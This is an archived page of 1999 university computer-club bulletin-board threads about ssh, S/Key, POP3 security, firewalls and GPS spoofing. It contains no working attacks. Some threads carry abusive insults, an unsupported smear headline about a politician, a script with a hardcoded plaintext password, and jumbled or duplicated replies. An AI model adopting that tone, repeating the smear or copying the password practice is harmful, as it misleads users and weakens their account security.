|
11/27 |
1999/9/28 [Computer/SW/Security] UID:16610 Activity:high |
9/27 Anyone successfully installed ssh on FreeBSD 3.3? \_ just copy the binaries straight from soda. \_ sh ./configure ; make ; make install ; ssh-keygen ; ssh http://blah.com \_ cd /usr/ports/security/ssh; make install; make clean \_ it didn't work on my sys. Something about rsaref not able to compile. How do I update the ports list? \_ use the source luke. |
1999/9/20-21 [Computer/SW/Security, Computer/Networking] UID:16556 Activity:high |
9/19 What is in.identd (running on port 113 (auth))? man isn't very clear on importance of the service. \_ T3 = 28xT1 \_ From identd(8): identd is a server which implements the TCP/IP proposed identd is a server which implements the TCP/IP proposed standard IDENT user identification protocol as specified in the RFC 1413 document. READ THE FUCKING RFC TWINK! --not tom READ THE FUCKING RFC TWINK! --not tom \_ "READ THE FUCKING RFC. I'M A FUCKING ASSHOLE." Grow up you fucking brat. \_ could this be the reason why .shost authentication doesn't work if you have this service turned off? \_ It's there to buxt the not-so-elite h4ckurz!!!!1 \_ ssh does not use identd. Turn it off, it's annoying. -tom \_ it does if linked against a libwrap.a that does rfc 1413 lookups by default. \_ negligible, given that there is a lot more tightly coupled copper wiring in the electrical cords, house wiring, etc., constant of the insulators. |
1999/9/20-21 [Transportation/Car, Computer/SW/Security] UID:16553 Activity:low |
9/18 anyone have a car and want a decent cassette deck? let me know... - danh \_ Boosting car stereos again danh? \_ could this be the reason why .shost authentication doesn't work if you have this service turned off? \_ It's there to buxt the not-so-elite h4ckurz!!!!1 \_ ssh does not use identd. Turn it off, it's annoying. -tom \_ it does if linked against a libwrap.a that does rfc 1413 lookups by default. |
11/27 |
1999/9/18-21 [Computer/SW/Security, Computer/SW/Unix] UID:16547 Activity:kinda low 77%like:16544 |
9/16 How do I pipe to an rsh? Say I want to do sort file | rsh machine -l user cat > file.sort \_ Exactly like that. If it doesn't work for you, what error message do you get? \_ Wanna get rid of 20 lbs of ugly fat real fast? Go in for a decapitation. \_ You might want to make sure you can rsh commands first. I generally \_ Use ssh instead of rsh. test with something llightweight like 'rsh remotemachine -l remoteuser whoami' first. -ERic \_ so your answer is? Just do plain exercise and hope that the fat around your abs goes away? \_ s/rsh/ssh/g \_ Assuming you have rsh set up properly do something like sort file | rsh machine -l user "cat > file.sort" or sort file | rsh machine -l user dd of=file.sort -ERic |
1999/9/18-21 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:16546 Activity:low 61%like:16538 |
9/16 Thinking about getting a text pager (one where I can forward from these pagers and service cost? Thanks. \_ Bless you! Lynx with SSL rocks. \_ Fat Whacker! \_ Exactly like that. If it doesn't work for you, what error message do you get? \_ Please rewrite this in English and I will try and answer. \_ Me speaky perfect goodly engrish so you fuck my mother!!! |
1999/9/15-17 [Computer/SW/Security, Computer/SW/Unix] UID:16526 Activity:moderate |
09/15 how would u transfer email addresses from an access database to a majordomo listserver every day? - turin (ie: ftp? or something else kewl i am missing?) \_ how do you automatically upload a file without being prompted with username and password via ftp? \_ .netrc . I wouldn't recommend it, though. --dim \_ pirate. way to go!! \_ The Man is watching. \_ scp. |
1999/9/15 [Computer/SW/Security] UID:16519 Activity:high |
9/13 So once again, does anyone know the side effects of dexadrine? - oh and yes, bitch, I am CVSing this motd. \_ Whats the point of cvs'ing a single file? -ERic (who has been rcs'ing the motd for months now) \_ Whats the point of cvs'ing a single file? -ERic \_ I know what this does (send me porn passwords), but can someone give a formal definition of what is going on here? \_ is your ADD so bad you can't do a web search for dexadrine and side effects? \_ I don';t have add you stupid fuckin gmororn.` and if you can't understand why I'm taking it then get the fuck out of the machine.csua you've been calling your world. \_ Everything in here is wrong except the bits about "gmororn", "this", and "porn". |
1999/9/9 [Computer/SW/Security] UID:16488 Activity:nil |
9/9 http://www.rouze.com (came out a bit early) |
1999/9/6 [Academia/Berkeley/CSUA, Computer/SW/Security] UID:16471 Activity:nil |
9/6 I have lists of student ID numbers I want to verify. Does Berkeley have some kind of service that lets me do this on a regular basis. (How does CSUA check SID against names or can someone just fill out a fake account form)? \_ http://regssl.berkeley.edu --jon |
1999/9/3-5 [Computer/SW/Security] UID:16458 Activity:moderate |
9/3 They're out there watching you: http://www.cnn.com/TECH/computing/9909/03/windows.nsa \_ Either MS was trying to please the DOJ to ease itself from the antitrust case, or it was simple an unintentional bug. \_ UNINTENTIONAL BUG? Jeeez, how stupid are you? WHy do you think microsoft "easily" got through various crypto regulations, when everyone else is fighting nasty battles? \_ Hey, fuckhead: don't go selectively erasing replies. Particularly, on-topic, and ACCURATE replies. To repeat: How the hell can it be "unintentional".. you don't "accidentally" distribute something with an additional key that can unlock everything. It was deliberately put in. Anyone with a CLUE would realise this was to get NSA/government approval for their crypto API stuff. In fact, anyone with a clue would have realized this the minute they heard that MS got their crypto API 'approved' a year ago or whatever. EXPORTABLE. This violates ITAR, without a back door! \_ see also http://www.cryptonym.com/hottopics/msft-nsa.html What I'm wondering is what MSFT gets in return? Think they cut some deal with our buddies in the NSA? \_ it's all about th "__NSAKEY" reference \_ Read some of the rank 5 posts on /. for clue which you won't find here. |
1999/9/3 [Computer/SW/Security, Computer/SW/Unix] UID:16456 Activity:high |
9/2 Root decided to turn off ~lwall/bin/mail.pl without notice. E-mail root and let them know that you are opposed to this change! \_ it's a great idea. shut up, nickkral -tom |
1999/8/30-9/1 [Academia/Berkeley/CSUA/Troll, Computer/SW/Security] UID:16435 Activity:high |
8/30 Is there any possibility that politburo will reconsider their policy concerning ftp? Too, we are unable to understand why POP3 access is ok \_ shut up, ikiru whereas those of us who have a tough time comprehending s/key ftp have to suffer. Plain text passwds are sent willy nilly via pop are they not? \_ Before you can begin to expect consistent policy from CSUA leadership, you need to exhibit consistent policy with your margins in the motd \_ The real answer is that since this is all done on a voluntary basis, they don't have time to lock down everything at once. Your gripe that you're being unfairly treated while pop folks are somehow allowed to continue violating basic security concepts is ill conceived. Expect that in time *all* of the incredibly lame services including pop will be either secured or disabled in time. services including pop will be either secured or disabled. If the csua was run by full time staff getting paid to do so, I'm sure this would have happened a long time ago. kudos to root and any of root's elves who helped for putting in the time required and biting the bullet from the whiners with zero security clue. \_ Mikeh and the rest of root staff rock! off POP3 for the foreseeable future (> 1 year). Turning off POP3 \_ POP3 is cleartext; there will be no solution other than turning off POP3 for the foreseeable future (> 1 year). \_ APOP is trivial to implement, and not cleartext. -tom \_ does APOP work with everyone's favorite GUI mail reader, or will they be bombarding root@csua with "My Outlook 95 doesn't work anymore? Is e-mail b0rken?" My assumption was that widespread conformance to encrypted POP won't happen in < 1 year. In regards to threads below, I eventually foresee turning off POP3, turning on APOP, and sending a mass e-mail to all CSUA members informing them of this and pine|elm|etc. and .forward. Turning off POP3 \_ no, ED IS! ED! ED! ED IS THE STANDARD! answer would piss enough people off of anything I can imagine. POP3 cleartext is THE way to sniff pw's. S/Key and ssh are a) steps in the right direction, and b) get the userbase accustomed to security annoyances. The reasoning is suspect, but for me it's not something to put up a fight about since I believe I understand the pros and cons. I look forward to non-availability of POP3 script-kiddie port sniffers. -non-Politburo sodan \_ Tough shit for the whining pop3 masses. Let them forward their mail or read it locally. I don't want to see soda broken into because some pop twits are too lazy to do the right thing. \_ then get off YOUR lazy ass and find an alternative. Oh, and PINE is not the answer. \_ *I* don't have a security problem reading my mail. If you're one of those whining security clueless pop users, the problem is yours, not mine. *You* need to find an answer, not me. Go look at APOP if you simply *must* use soda as your mail server. I'm not lazy at all. I already solved this problem for myself years ago, thanks. \_ Then when i crack your account by sniffing your passwd and then bring down the internet with my elite hacking and the blame all falls on you, ! H0P3 U $+!lL (@N Sl33P @ |\|!6H+... \_ D00d, th@t p05t3r uz3z 55H! U l00z3! \_ ED ED IS THE STANDARD! \_ install unix it will cure cancer and bring you the magical mystical gold at the end of the rainbow \_ No, idiot. You can't sniff my password. My pw never goes out in clear text. You won't be cracking my pw anytime soon. It's *your* password I don't want cracked. |
1999/8/30 [Computer/SW/Security] UID:16428 Activity:high |
8/29 Hillary involved in Waco fire deaths! http://www.drudereport.com/matt.htm |
1999/8/28 [Computer/SW/Unix, Computer/SW/Security] UID:16415 Activity:nil |
8/27 Can I use ssh port forwarding to FTP to soda? What port do I need connect to at soda? \_ Yes, but you'll still need to login using S/Key \_ if you do it right, you do not need s/key \_How do I do it Right? |
1999/8/28-30 [Computer/SW/Security] UID:16410 Activity:nil |
8/27 Does shost use a callback scheme to authenticate the host? I'm having problems doing an shost login through a firewall. Of course, I bet all those die hard security people are going to flame me for using shost now. \_ try an ssh -v. It may be failing because it's trying to authorize the client's host key. IIRC, to use shosts, at least with the config on soda, your client key must be in soda:~/.ssh/known_hosts \_ Some firewalls don't pass privileged ports properly. Try "ssh -P" |
1999/8/26 [Computer/SW/Security] UID:16400 Activity:insanely high |
8/25 Can someone finish this off. I'm trying to get rc.local to automatically establish a secure tunnel to uclink4 but I can't seem to get expect to work. ssh -f -lmyusername -L 143:uctwink4:143 uctwink4 _???_ \_ seems ok to me, but I think it would still require a passwd unless you use RSA (-i identity file). But I may be wrong, I'm no guru. -chingon \_ Where I have a _???_ I had it execute and expect script like #!/usr/local/bin/expect -f expect "password: " send -- "mypassword\r" that didn't seem to work. It still asked me for a password \_ you want expect to spawn ssh instead, because it's ssh that's asking you for the password. \_ Then what goes in place of the _???_ \_ try "sleep 1800" (which uclink actually ignores but which is correct in general and which makes ssh happy) |
1999/8/25-28 [Computer/SW/Security] UID:16394 Activity:nil |
8/25 Does the modified s-key telnet login system use ip identification to associate user name with challenge offerings? For instance, if I login with my user name mispelled, the password: prompt appears without offering an s-key challenge. so my question is how does skey know when to offer a challenge? \_ If there is no account with the name you typed, skey can't be set up for that username, so it can't challenge. \_ there is so much m, you must rtfm |
1999/8/24-26 [Computer/SW/Security] UID:16387 Activity:kinda low |
8/24 I don't understand why ftp is s/key enabled but tons of folks still pop their mail that is still a big security hole for the less competent users of soda I believe \_ Wrapped for the good of the people. \_ Wrapped with what? tcpwrappers is useless unless you actually enable some rules. \_ One step at a time. Secure POP/IMAP methods are being investigated. \_ Step one should be to THINK ABOUT THE ACTUAL AFFECT \_ effect. \_ I don't know if this is enforceable, but I use an SSH tunnel to soda's IMAP server. That's a possible alternative. \_ It's trvially enforceable (just have TCP wrappers only allow connections from localhost. |
1999/8/24 [Computer/SW/Security] UID:16385 Activity:nil |
8/23 Someone turn off the POP3 port (110) ? More unneeded security for the CSUA penitentary? \_ No, I think it's just hozed. Try mailing root. |
1999/8/19-20 [Computer/SW/Security] UID:16348 Activity:high |
8/19 Is it possible to disrupt GPS signal? Can Russians/Chinese send a satellite that sends false signal? \-well i guess i am now the gps "expert". well, yes, of course the system/signal can be disrupted. whether it can be spoofed is a trickier question ... because that is a detection-evasion issue. the answer depends on what scenario you are looking at. there is considered anti-spoofing engineering that has gone into the system and the protocol/signal design. if you have a more specific question, i may have a more specific answer. --psb \_ whatever. zip your pants back up. \_ Not to mention that the signal is encrypted (PPS) and purposefully munged (bias in SPS). --dim \-the question is about a hostile attack [denial/spoof] which is different from an attack on an encryptions system [which is about extracting info, not restricting info or false info] so this normal mode isnt especially relevant. you seem to be getting at the source of errors. there are a huge number of sources of errors, some of them mathematical and contrived, other from circumstances [signal quality where you are, HDOP, etc.] or from nature [ionospheric delay [also measured in L2 channel]]. SPS bias [called SA] is usually about 100m XY, 150m Z, and 350ns time but this too is varied to limit how much refining youc an do by long observations in carrier phase mode. on the L2 [secure channel], in addition to the normal encryption [P code], there is hardened mode for spoof detection which involves re-encrypting the L2 signal into Y code ... you need an even higher clearance for Y than PPS. i will now have to kill all of you. --psb \_ I was more addressing the "false signal" aspect than the "interrupt" aspect. Since the signal is encrypted, it would seem it would be difficult to spoof unless the spoofed signal used the same encryption algorithm. --dim \not necessarily. i am not sure if a "playback attack" would work because time is part of the encoding but in theory you could record the L2 telementary and just play it back at the wrong time. i am not sure what recievers would do with that. again it depends how exotic a scenario you want to envision ... i mean if the russian can park a mini-black hole next to the SV and slow down the cesium and rubidinum clocks on the satellite that would work too. i mean yes your answer acknowledges "there is some security in the system". --psb \_ A playback attack of this sort is (if it worked) basically a denial of service attack. I was more referring to an attack that would result in a diabolical signal skewed from the original by some known coordinates. It might be possible, but not easy to do. I agree that denial of service is the simplest way to go, but it's more obvious and less vile. --dim \-this is not what is usually considered a DoS. That would be more analogous to blocking the signal or some other way of preventing satellite lock. that's a spoof attack. --psb \_ Semantics. Using a spoof attack to deny service. Depends on what the original poster meant by "false signal". Of course, now that I think about it, wouldn't the original signal have to be jammed in some way first? How would the receivers react to multiple signals? --dim \-if i spoof a source address and use this to break into your machine and i use that to read your resume to find out your home address and then come over and cut your fingers off, i wouldnt call that a DoS or a spoof attack. what would you call it? nice account name. --psb \_ Dude, chill out on the coffee. You know what I meant and that's why I used the word "basically". --dim \-psb ttyPv Aug 10 00:38 (coffeehut.lbl.gov) \_ So it sounds easy to "disrupt" signal. So how hard can it be for Milosevich to send out GPS signals? If he had done it from the beginning, then there wouldn't be any cruise missile right? \_ Yeah I totally saw this in a movie and like though James Bond was like really cool with thise Chinese chick and they like you know figured it out and stopped the bad guy and totally were on the make so yeah the Russians can probably do it and steal our people who are out boating and stuff and make them boat to Russia and be held captive while hiking and stuff so like uh huh nuke 'em before they take over the GPS because then they could boatjack our navy and make these really cool ufos the airforce have get confused and land in China or Russia or Iraq!!!! |
1999/8/13-15 [Politics/Foreign/Asia/China, Computer/SW/Security] UID:16312 Activity:kinda low |
8/13 Anyone seen this? I wonder if we could determine if it's for real: http://www.iacr.org/~iacr/misc/china I'm trying to find alternate sources of verification. -brain \_ It's obviously a hoax. No one is going to hand over $300m in gold because someone found a tablet. It's ridiculous. \_ i"ve just decyphered it. The text tells of the location of the Ark of the Covenent \_ I saw a problem with the date, it says ROC year 1933, but there's no ROC year 1933. Obviously, it's western year 1933, which is ROC year 22. \_ Another problem is that the "Hua" character in "Chung Hua Min Kwo" (Republic of China) is in Simplified character which was not used in ROC and in present Taiwan. Simplified character is only used by Communist China which was founded in 1949. -- yuen \_ I have discovered the solution to this problem, but the motd is too small to contain it. -fermat \_ umm, okay, really I was asking, "I wonder if there are actual gold bars with valid encrypted data on them, and if so, what the encrypted message is." The transaction detailed by the story is actually irrelevant, because, as you say, it's a sure bet that the account is no longer valid. -brain |
1999/8/6 [Computer/SW/Security, Computer/SW/Unix] UID:16264 Activity:high |
8/6 After <DEAD>www.windows2000test.com<DEAD> has gone down 3 times <DEAD>crack.linuxppc.org<DEAD> has yet to do so nor has it been cracked. For any of you intrested, the root password is linuxppc. [not any more it aint] Give it a shot and win a free computer. \_ lemme guess. set up by the same schmuck that put up a target at defcon, running OFF A CDROM DRIVE. If I wasn't too busy,I'm tempted to nail the damn thing myself. But then again, where the hell can I get a "normal" linuxppc account to compile stuff? \_ on your mac \_ Exactly. How many LinuxPPC users out there? Also, I was under the impression that the PPC code was not open source. Is that correct? \_ It can't include Linux kernel sources if it's not "open source" (GPL'ed) \_ Gee, my computer might go down too if STRUCK BY LIGHTNING. \_ Somebody did a traceroute and found that all of the routes up until the machine was still operational. Microsoft claimed that the router failed. It's summer, the weather's good |
1999/8/2-3 [Computer/SW/Security] UID:16222 Activity:moderate |
8/1 Anyone taken a look at, or know anyone who has taken a look at the source for pgp 6.5.1. For some reason i have more faith in the integrity of the older versions. (Just 'cause i'm paranoid doesn't mean that they're not out to get me). \_ What makes you suspicious of 6.5.1? \_ Old Calvary are suspicious of tanks. It is just because, back in the day, i was around paranoid types that i trusted who said PGP had been checked and was o.k. That was pre pgp_for_windows and pre talk of clipper chips. \_ I looked at it. Did you see the function in there called SendKeyAndDataToJanetReno@FBI.GOV??? I was shocked but it's really in there! No kidding! |
1999/8/1-2 [Computer/SW/Security, Computer/SW/Unix] UID:16219 Activity:very high |
8/1 http://istpub.berkeley.edu:4201/bcc/Sept_Oct99/avc.students.html IS&T once again tries to catch up to what student groups have provided for the last 10 years, and only manages to see part of the picture. (Last time, they decided all students needed was e-mail and we got UCLink. Just imagine how screwed up this new file server will be.) \_ soda [21] wc -l /etc/passwd 2501 /etc/passwd Think of how disasterous that would be to provide 30,000 traditional style login acounts on a single computer (not to mention how expensive the hard disk space would be). The fact is that most majors don't require a unix shell account but it would be nice for the common Berkeley student to have some unix experience. Unfortunately costs and needs don't always coincide. \_ Utterly lame! If i'm making $20+/hr being a paralegal or a doctor I don't have the time or the inclination to fiddle around with unix man pages. I am more productive using 1. an interface I'm used to (since I'm not a programmer what do I care about software development) and 2. an interface that supports applications ALL MY COLLEGUES IN _MY_ (not YOUR) FIELD USE. I'd rather spend my time ski-ing or outdoors than fiddling around with .conf files. \_ That's funny. I have time to do my regular school work, fiddle with .conf files, read the fucking man pages, and go skiing. And unix is VERY useful for people not in the CS major. Go ask the people at LBL what they use for physics simulations. \_ dear God, is the bigotry so deep within you that you fail to see the point? The point is that I AM NOT YOU. I DO NOT WANT TO BE LIKE YOU. What if i said I was a pre med student who spend time commuting to various hospitals in the area? That's more than just regular school work. Tell me, is unix helpful in my anatomy class? Is it useful for LabView? is it useful in my philosophy class? Is it useful when I call my girlfriend up and see what time she'd be ready to go see the opera? Climb out of your cubicle, man. \_ idiocy deleted. \_ fascist nazi. What gives you the right to delete people's opinions at your whim? What's next after your ssh tactics? rm -rf people you don't like? my time with my friends or girlfriend than fiddling around with .conf files. - Publius \_ uh, so why do you care if people who are *not* idiots have Unix shell access? You can diddle around with Netscape all you want, regardless. -tom \_ It's about the oppurtunity to do what you want. \_ Why use a single computer? The OCF provided 12,000+ login accounts 5 years ago on a cluster of 1989-era machines (Motorola 68030 & 040 based apollos). As for disk space, that's what IS&T is proposing to do. \_ providing shell access to uclink4, for example, would lower CPU usage (POP is very expensive) and support costs. The support cost argument is bullshit; if you look at the total cost picture, having shell access is much cheaper. What IST means when they say "it costs less" is "it costs US less". -tom \_ IS&T has a history of ignoring reality, tom. you should know that. \_ Support costs go up when idiots start wanting to use shells. \_ I would say, rather, that they ignore campus concerns in favor of doing things which are convenient for them. -tom \_ They should buy a NetApp. \_ NetApp's suck. EMC, dude. \_ lets take this to http://ucb.computing.announce (ucb.computing.discussion would be better but there is no such group ... yet) --jon \_ hence, mail root@agate \_ hence the "... yet" --jon \_ Okay, now lets take this to http://ucb.computing.discussion --jon |
1999/7/30-31 [Computer/SW/Security, Computer/SW/OS/Windows] UID:16207 Activity:moderate |
7/29 I have a friend. Or rather, I had a friend. I very recently killed him. My friend believed he could safely install linux on a partition on my win95 machine while I slept. The long and short of the story is that he couldn't, and I now have no DOS partitions. I don't think any of the data was screwed up, but the partitions aren't there anymore. Could someone recommend a utility or two to try to recover some files? -mjm \_ need more info about your current state. does linux boot up? if it does you can recover much of the fat32 partition and place it on some storage medium. try running fips and see what the partitioning tables look like \_ where did you bury the corpse? \_ Linux boots up. The partition table is all jacked. (It's got the part's that linux created, but there nothing like what the original were.) I've got FAT16, if that matters. I do kinda remember what the partition sizes were. \_ by, the way, it would probably better if you run /sbin/fdisk and type p to print out the partition table and post the results on the motd. --jeff \_ If you would like to backup your dos partition here's what you do. In the /etc/fstab file and add the entry /dev/hda1 /mnt/dos vfat defaults 0 0 or something like that. the first field is the device that your dos partition is on and /mnt/dos is the directory that you want to mount your dos partition. then issue the command "mount /dev/hda1" and you can access your dos partition in /mnt/dos. How you get that drived backed up is another story. Too complicated? Try going into your /etc/lilo.conf file. If you're using RedHat you might have an entry like other=/dev/hda1 label=dos table=/dev/hda If there isn't one add it and run /sbin/lilo. Of course make sure that /dev/hda1 is where your dos partition is. Reboot your computer and at the LILO: prompt type "dos" and it should boot up into Windows. Deleting the linux \_ Your friend did you a big favor. Its about time you accepted that Win95 is obsolete and started using the best technology that is available: Linux 2.2.x. Don't recover your DOS partitions, forget about the dark side and start living in the future of computing. partition (I'm not sure why you want to do that) is a matter of running fips or partition magic and running fdisk /MBR at the dos prompt. Hope that helps. --jeff |
1999/7/23 [Computer/SW/Security] UID:16187 Activity:low |
7/22 Regarding s/key -- is it at all useful to set it up if I regularly use ssh to login? And if I do set it up, will I have to use the s/key passwords when I log in via ssh? \_maybe. will you always have ssh available? setting up skey only affects telnet and ftp, not ssh. \_ yes, you'll need S/Key for ftp \_s/key is a good thing for if you don't have accesst to ssh, or for some reason like plaintext, one-time, passwords and plaintext transmission of your session better than a fixed password and an encrypted session. It helps to read the info you can find on the web about the two different technologies. But no, you don't have to use both. |
1999/7/22-23 [Computer/SW/Security] UID:16185 Activity:moderate |
7/22 If someone didn't set up s/key (i.e. keyinit) before the 15th, and now doesn't have access to ssh, is there any way he can set up s/key? \_ log into a machine that has ssh, and ssh into soda. \_ What part of "doesn't have access to ssh" didn't you understand? \_ does "someone" have access to a Java-capable browser? Use http://www.csua.berkeley.edu/ssh \_ Read the question again. I didn't ask for generating OTP's. I asked about what to do if 'keyinit' wasn't run before July 15. Someone like this logs in and does not get an s/key challenge. Oh yes, and *someone* really is someone other than me. Moron. [my rude answer deleted. sorry.] \_ The answer has nothing to do with generating OTPs. As the official motd says, a java ssh client is available at <DEAD>...edu/ssh<DEAD> Try not to be such a fucking jerk the next time someone tries to post a helpful motd answer --pld \_ Sorry. I totally blew it reading the answer. My apologies to whomever gave the answer that I so stupidly ignored. \_ Huh? I don't know about s/key and I've never ran "keyinit" or anything like that. I just downloaded an SSH client and now I can log in fine. -- yuen \_ Exactly. I've basically ignored all this S/Key stuff. You don't *need* it to log in. Or have you ever tried logging in withOUT whatever this s/key thing is? |
1999/7/22-23 [Computer/SW/Unix, Computer/SW/Security] UID:16184 Activity:nil |
7/22 How do you log off those people how are still using a telnet session since the pre-ssh enforcement period? \_ The ban is on cleartext passwords. Using telnet is fine. |
1999/7/22-23 [Computer/SW/Security] UID:16181 Activity:nil |
7/22 How do you prolong your ssh session such that the server doesn't automatically log you out? --converted ssh user /_ dont use keepalives, fixk your firewall, dont uses tcsh autologout |
1999/7/20 [Computer/SW/Security, Computer/SW/OS/Windows] UID:16165 Activity:moderate |
7/19 More NT security hole: http://support.microsoft.com/support/kb/articles/Q221/9/91.ASP \_ Why do you folks keep posting old MS holes? Subscribe to the MS security bulletin service and ntbugtraq and be done with it. \_ B3CUZ L1NUX 1Z TH3 P3RF3CKT 0S W1TH AB0LUT3L3 N0 S3KUR1TY H0L3S AT ALL, D00D!!1!! TH1Z PRUV3S 1T!!1!!! \_ Also http://support.microsoft.com/support/kb/articles/Q234/5/57.ASP |
1999/7/16 [Computer/SW/Security, Academia/Berkeley/CSUA/Motd] UID:16144 Activity:moderate |
07/15 I don't get s/key... isn't soda supposed to issue an s/key challenge when I ftp into soda? \_ You must be this tall to use skey \_ You have to set up your key first. see man skey(1) \_ http://soda.CSUA.Berkeley.EDU% man skey(1) Badly placed ()'s. \_ You must be this tall to use man \_ "skey(1)" means to type "man 1 skey" -- it looks up skey in manual section 1 (user commands). The section number is optional, but it matters if there are two manpages with the same name -- for example, printf(1) tells you about the "printf" command-line utility, but printf(3) tells you about the C library function. \_ SONOFABITCH!! I can't believe someone actaully posted a usefull and non-insulting reply!! Surely the motd gods will banish you for eternity! You asked for it! \_ man skey |
1999/7/15-16 [Computer/SW/Security, Computer/SW/Unix] UID:16138 Activity:high |
7/14 S/Key is neat-o. It works even if you don't have ssh. \_ S/Key is useful, but understand that it only protects your _soda_ password. If you connect to soda using telnet and s/key, then telnet somewhere else and type your ordinary password for that place, it can be sniffed. ssh is not an annoying frivolity, it is a good thing; use it if you can. --dbushong \_ Question (not necessarily rhetorical)- Is giving your password to a web-based java applet really an improvement over telnet? \_ Yes, because your password is encrypted before leaving the machine. (Of course, the csua should put it on an ssl httpd for the truly paranoid.) Yeah, yeah, Java is secure, but aren't there ways around that too? \_ so download the applet, and install it on your own server. Then worse case, it could only communicate back to THAT server. And/or just set your security settings to disallow applets from making ANY net connections. \_ So wouldn't it be nice to have an authorized s/key applet on soda? \_ http://www.csua.berkeley.edu/skey |
1999/7/14-16 [Computer/SW/Security] UID:16133 Activity:high |
7/14 For people whose firewalls allow telnet but not ssh, I set up scotch to redirect telnet and rlogin (ports 23 and 513) to soda's sshd. You should now be able to run "ssh -p23 http://scotch.csua.berkeley.edu" and log in to soda. Thanks to alanc for suggesting this. --mconst \_ My firewall runs telnet proxy. I couldn't ssh before, but this works brilliantly. Thanks, guys! -John \_ note that this wont work if your firewall requires use of a proxified program to get through the firewall (like say telnet linked against the socks library) \_ You can run ssh through socks: use "./configure --with-socks" when you build ssh. Note that most socks servers will let you connect directly to soda port 22. If yours doesn't, you should still be able to use the telnet redirector on scotch. --mconst \_ runsocks ssh then \_ note this is not intended as the solution to all ssh/firewall problems, just one set of them \_ mconst and alanc, that was a rad solution to the ssh problem! You guys RULE! -ax \_ hey, i was the one who came up with having sshd listen to port 23. i just didn't sign my name on the motd since i The fact that they implemented it on Scotch ahead of the switchover is what makes them rule. -ax didn't know how it would be recieved among nit-picky admins. \_ I had that idea too. It's logical conclusion to reach. The fact that they implemented it on Scotch ahed of the switchover is what makes them rule. -axa \_ I got credit simply because I MAILED ROOT with the sugesstion. If you want to get people's attention, direct e-mail beats anonymous MOTD posts any day. -alan- \_ maybe i'll sign my motd posts with a pgp signature next time. :-) \_ Yeah! mconst for President! mconst and alanc 2000! |
1999/7/14-16 [Computer/SW/Security] UID:16131 Activity:moderate |
7/14 When trying to connect to CSUA with F-Secure SSH 2.0.12 build 9 I'm getting the error "Disconnected;protocol version not supported." Anyone else get this, any ideas? \_ you're probably using the wrong protocol. make sure you're using the right ssh protocols. \_ I don't get it. Isn't CSUA an entirely non-profit organization for educational purpose? Why can't we use ssh2? \_ People won't be able to connect from work. \_ ssh2 is supposed to be backwards compatible. use the -v flag next time and post the output. \_ ssh2 is not backwards compatible. You will need to use an ssh1 client to connect to soda; we can't run the ssh2 server because it has a restrictive license. \_ Tried http://csua.berkeley.edu -v and receive the error "No address associate with the name" I do not see a place to change the protocols in F-Secure. \_ ssh2 is definitely not backwards compatible. -tom \_ You need F-Secure SSH version 1.something. \_ And remember, tomorrow you won't be able to post this! Have fun! \_ S/Key works just fine. It's a pain in the ass logging in, but it requires nothing mroe than telnet. |
1999/7/14-16 [Computer/SW/Security] UID:16130 Activity:high |
7/14 My company firewall doesn't allow port 22 connection. What should I do? And getting my ignorant IS management people to open this port is probably harder than sleeping with their wives. Is there an alternative way to ssh to soda? \_ If you find a port that your firewall allows, let us know and we can probably set up an extra sshd on that port. --mconst \_ Try the port redirector I just installed on scotch (look three motd entries up). --mconst \_ Thanks. It works. \_ I find it very easy to sleep with IS management's wives. \_ Everyone who isn't an IS manager does. \_ .forward your email. Your soda account by default is insecure since it is run and used by a bunch a hackers. \_ Huh? How much more off topic could you get? \_ anyone notice you can telnet to another server and ssh from there? \_ Anyone notice how this COMPOUNDS the problem? Don't. --sowings \_ The PROBLEM is that soda isn't allowing telnet any more. So no, it doesn't compound the problem \_ Soda allows telnet. It doesn't allow cleartext passwords. Don't get mad, get clue. \_everything running over the telnet will be free game, before it gets encrypted. \_ that was my point... a mandatory ssh on soda won't necessarily force people to be safe... \_ clue time: you can never force people to be safe. \_ then why mandatory ssh? \_ cuz smart people will simply download the software and use ssh on the machine they're sitting at instead of doing a roundabout telnet into another machine. which one is more of a hassle? apparently some people think it's more convenient to telnet then ssh each time. but then again, berkeley admits some pretty stupid people. \_ Worse yet, they give them degrees. |
1999/7/12-14 [Computer/SW/Security, Transportation/Bicycle, Computer/SW/OS/Windows] UID:16115 Activity:high |
7/12 a good windows mail client that supports pgp? Wait, i know, RIDE BIKE, use linux, I DO, but i need *others* to use pgp with and the others use windows. \_ Outlook \_ Outlook? What version? Last v. I tried was complete trash. \_ ok, pardon my ignorance, but could someone please explain the connection betwen Linux and RIDE BIKE ? \_ Guessing: someone is mocking the attitude/mentality of both groups? \_ How does that differ from the 50 million "Windoz Rulez, \_ Who said it differed? use windows" that also go on the motd, not to mention that their attitudes and mentality are usually worse. I also seem to remember a quote, "drive a fucking car you hippie" posted somewhere on a long ago motd showing taht non-bike riders are just about as bad. \_ PGP for Windows (commercial, from NAI) will integrate well with Eudora Light or Pro. However, Eudora light tends to corrupt important Windows files and generally suck. --dbushong \_ ride bike. \_ use freebsd. \_ use linux. \_ freebsd >> linux \_ use Motd::Public; \_ Less filling >> tastes great |
1999/7/11-14 [Computer/SW/Security] UID:16104 Activity:low |
7/10 Anyone know if someone has written an SKey generator for the Palm OS? Would be handy to have the key generator handy... \_ http://astro.uchicago.edu/home/web/valdes/pilot/pilOTP i haven't tried it yet tell me if it works --oj \_ YES, it works. just logged in with it. thanks! no excuses to not use skey now... \_ How about, "I don't have a Palm Pilot"? \_ Any source code out there for S/Key? \_ /usr/src/usr.bin/key/skey.c on soda --dbushong |
1999/7/6 [Recreation/Dating, Computer/SW/Security] UID:16085 Activity:nil |
7/6 Do you guys think that http://whitehouse.com shouldn't be what it is? |
1999/7/2 [Computer/SW/Security] UID:16057 Activity:high |
